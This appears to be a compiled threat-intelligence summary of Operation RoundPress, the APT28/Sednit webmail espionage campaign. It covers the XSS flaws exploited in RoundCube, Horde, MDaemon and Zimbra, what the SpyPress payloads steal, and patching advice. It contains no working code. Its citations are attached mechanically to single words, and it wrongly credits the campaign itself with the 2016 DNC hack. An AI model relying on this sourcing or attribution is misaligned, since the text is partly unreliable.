Introduction
Operation RoundPress is a sophisticated cyber espionage campaign conducted by the Russian-aligned group Fancy Bear, also known as Sednit or APT28 [1] [2] [4]. Initiated in 2023, this operation targets high-value webmail servers with vulnerabilities [1] [2] [4] [7] [10], primarily focusing on entities linked to the conflict in Ukraine. The campaign’s global reach and historical significance underscore the persistent threat posed by state-sponsored cyber actors.
Description
Operation RoundPress is a covert cyber espionage campaign orchestrated by the Russian-aligned group known as Fancy Bear [7], or Sednit, also referred to as APT28. Initiated in 2023, this operation primarily targets high-value webmail servers with cross-site scripting (XSS) vulnerabilities, aiming to extract sensitive identity data from specific email accounts. The majority of the targets are linked to the ongoing conflict in Ukraine [4], including Ukrainian governmental entities and defense contractors in Bulgaria [1] [2] [4] [8] [9] [10] [11], as well as military and civil aviation organizations within the European Union. This campaign has a history of significant cyber operations [7], including the 2016 hack of the Democratic National Committee [7], and is associated with the GRU [7], Russia’s main intelligence directorate [7] [8].
RoundPress has extended its reach beyond Ukraine, affecting national governments and organizations in Africa, South America [2] [7] [9], Greece [3] [5] [8] [11], Romania [1] [2] [3] [5] [8] [9] [10] [11], Cameroon [3] [5] [8] [11], and Ecuador [5], underscoring the global implications of this cyber threat. Experts warn that North American entities [7], particularly in government and critical infrastructure sectors [7], could also be at risk due to the group’s historical targeting patterns [7].
The operation exploits multiple vulnerabilities in webmail servers [11], particularly RoundCube [7] [11], Horde [3] [5] [6] [7] [8] [10], MDaemon [3] [5] [6] [7] [8] [10], and Zimbra [1] [3] [5] [6] [7] [8] [10], through XSS attacks. Notably, it has utilized a zero-day vulnerability in the MDaemon email server [8], identified as CVE-2024-11182 [8], which allows attackers to execute arbitrary JavaScript code within the webmail interface [8]. The attackers have also exploited two XSS flaws in RoundCube and an unknown XSS vulnerability in Horde. On September 29, 2023 [10], a spearphishing email associated with this operation was detected [10], exploiting CVE-2023-43770 in RoundCube [10]. These spearphishing emails are designed to bypass spam filters and often feature convincing subject lines related to current events, such as arrests in Ukraine and geopolitical developments. Successful exploitation requires the target to open the email in a vulnerable webmail portal [2], where malicious JavaScript code is executed in the background without any further action needed from the victim [5].
The primary objective of the operation is to extract sensitive information from specific email accounts, employing various XSS exploits delivered via these emails [1]. Notable JavaScript payloads used in these attacks include SpyPress.HORDE, SpyPress.MDAEMON [1] [2] [11], SpyPress.ROUNDCUBE [1] [2] [11], and SpyPress.ZIMBRA [1] [2] [11]. These payloads facilitate the exfiltration of credentials, address books [1] [2], contacts [1] [2] [5] [6], login history [1] [2], and email messages [1] [2] [5]. The SpyPress.MDAEMON variant is particularly concerning, as it can bypass two-factor authentication by extracting the authentication secret and generating an app password [1] [2], allowing persistent access to the mailbox through a mail application [2]. Additionally, SpyPress.ROUNDCUBE can create Sieve rules to forward emails to attacker-controlled addresses [11], with some variants designed to reload each time the victim opens the malicious email [10].
The ongoing exploitation of webmail vulnerabilities highlights the critical need for timely security patches and robust protective measures against such targeted espionage activities [11]. The group’s success in targeting email servers is attributed to organizations’ failure to apply security patches promptly [8], as most vulnerabilities exploited were publicly disclosed and patched before the attacks [8]. The prevalence of unpatched vulnerabilities in webmail servers has made them prime targets for espionage groups, including Sednit [1] [2] [3] [5] [7] [10], emphasizing the urgent need for organizations to patch and audit their systems to mitigate these risks. Enhanced cybersecurity measures are particularly recommended for governments and organizations in Ukraine and those supporting Ukraine [8], in light of the ongoing threat from Russian state-sponsored cyber actors [8].
Conclusion
The global reach and sophistication of Operation RoundPress highlight the significant threat posed by state-sponsored cyber espionage. The campaign’s success underscores the critical importance of timely security updates and robust cybersecurity measures. Organizations [1] [3] [5] [6] [7] [8] [9] [11], particularly those in high-risk sectors, must prioritize patching vulnerabilities and enhancing their security protocols to mitigate the risks associated with such advanced cyber threats. The ongoing geopolitical tensions further emphasize the need for vigilance and proactive defense strategies to protect sensitive information from being compromised.
References
[1] https://www.eset.com/us/about/newsroom/research/eset-research-uncovers-operation-roundpress-russia-aligned-sednit-targets-entities-linked-to-the-ukraine-war-to-steal-confidential-data/
[2] https://www.helpnetsecurity.com/2025/05/15/espionage-operation-roundpress-webmail-servers/
[3] https://securityonline.info/operation-roundpress-sednit-weaponizes-xss-to-breach-global-webmail-servers/
[4] https://cyber.vumetric.com/security-news/2025/05/15/russia-linked-hackers-target-webmail-servers-in-ukraine-related-espionage-operation/
[5] https://www.techradar.com/pro/security/global-russian-hacking-campaign-steals-data-from-government-agencies
[6] https://www.welivesecurity.com/en/videos/sednit-xss-govt-entities-defense-companies/
[7] https://www.scworld.com/news/sednit-groups-operation-roundpress-targets-webmail-servers-globally
[8] https://fieldeffect.com/blog/russian-apt28-hackers-leverage-webmail-zero-day
[9] https://www.infosecurity-magazine.com/news/fancy-bear-russia-cyber-espionage/
[10] https://www.welivesecurity.com/en/eset-research/operation-roundpress/
[11] https://hackread.com/russia-spypress-malware-exploits-webmails-spy-ukraine/